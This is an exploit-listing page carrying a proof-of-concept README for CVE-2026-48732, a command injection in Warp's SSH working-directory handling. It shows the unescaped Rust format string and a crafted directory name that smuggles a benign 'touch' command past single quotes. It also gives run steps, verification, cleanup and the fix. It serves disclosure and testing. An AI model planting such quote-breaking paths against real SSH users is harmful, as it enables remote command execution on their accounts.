Exploit for CVE-2026-48732

Name: Exploit for CVE-2026-48732
Rating: 5 (53 reviews)
2026-06-10 | CVSS 5.7
## https://sploitus.com/exploit?id=F61BAFBC-6B82-5BDB-B42A-333382F0F782
# CVE-2026-48732: Warp Remote SSH cwd Command Injection PoC

## Description

This repository contains a Proof of Concept (PoC) for **CVE-2026-48732**, a high severity OS Command Injection vulnerability in **Warp** legacy SSH background command handling.

Affected Warp versions used the remote working directory (`cwd`) reported by an SSH-backed session when constructing helper commands. Because embedded single quotes in that path were not escaped, an attacker-controlled remote host, repository, or directory name could break out of the quoted `cd` argument and append shell syntax that runs on the remote host as the victim's authenticated SSH account.

**Discovered by: saku0512** ([GitHub](https://github.com/Saku0512))

## Disclaimer

This project is for educational and ethical security testing purposes only.

The author is not responsible for any misuse, damage, or illegal activities caused by this tool. Unauthorized access to computer systems is illegal. By using this software, you agree to use it only in environments where you have explicit permission to conduct security testing.

## Vulnerability Details

- **CVE ID**: CVE-2026-48732
- **GHSA ID**: GHSA-qqpc-wvvw-4269
- **Type**: OS Command Injection (CWE-78)
- **Impact**: Remote Command Execution on the connected SSH host
- **CVSS**: 8.8 High (`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`)
- **Affected Versions**:
    - Warp `>= v0.2023.03.21.08.02.stable_00`
- **Fixed Version**:
    - `v0.2026.05.06.15.42.stable_01` or later

## Root Cause

The vulnerable legacy SSH background command path wrapped the remote working directory in single quotes without escaping embedded single quote characters:

```rust
command_str.push_str(&format!("cd '{current_directory_path}' && "));
```

If `current_directory_path` contains a value such as:

```text
/tmp/warp-cve-2026-48732'; touch /tmp/warp_cve_2026_48732_confirmed; echo '
```

the generated shell command becomes:

```bash
cd '/tmp/warp-cve-2026-48732'; touch /tmp/warp_cve_2026_48732_confirmed; echo '' && pwd
```

The injected `touch` command is interpreted by the shell as a separate command.

The patch escapes embedded single quotes before placing the path into the single-quoted shell context.

## Proof of Concept (Usage)

### 1. Environment Setup

Ensure you have Python 3 installed. This PoC simulates the vulnerable command construction locally and does not connect to Warp or SSH.

```bash
python3 --version
```

### 2. Execute Vulnerable Simulation

Run the provided script:

```bash
python3 poc.py
```

Expected output includes a generated vulnerable command and a success message showing that the marker file was created:

```text
[!] SUCCESS: /tmp/warp_cve_2026_48732_confirmed was created.
```

### 3. Verification

Verify that the command was executed successfully by checking for the marker file:

```bash
ls -l /tmp/warp_cve_2026_48732_confirmed
```

If the file exists, the command injection behavior is confirmed in the local simulation.

Clean up the marker file after verification:

```bash
rm -f /tmp/warp_cve_2026_48732_confirmed
```

### 4. Patched Behavior Simulation

Run the fixed command builder:

```bash
python3 poc.py --mode fixed
```

The fixed simulation escapes embedded single quotes, so the marker file should not be created.

## Remediation

Update Warp to a patched release immediately.

The fix escapes embedded single quotes in remote paths before constructing legacy SSH helper commands, preventing attacker-controlled path text from breaking out of the quoted shell argument.

## References

- [GHSA-qqpc-wvvw-4269](https://github.com/warpdotdev/warp/security/advisories/GHSA-qqpc-wvvw-4269)
- [CVE-2026-48732](https://vulners.com/cve/CVE-2026-48732)
- [Warp fixing commit 88c344e2de662a935f0ef0896458494ef2413add](https://github.com/warpdotdev/warp/commit/88c344e2de662a935f0ef0896458494ef2413add)